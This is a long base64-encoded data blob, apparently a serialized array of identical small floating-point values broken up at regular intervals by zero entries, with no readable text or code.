lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lP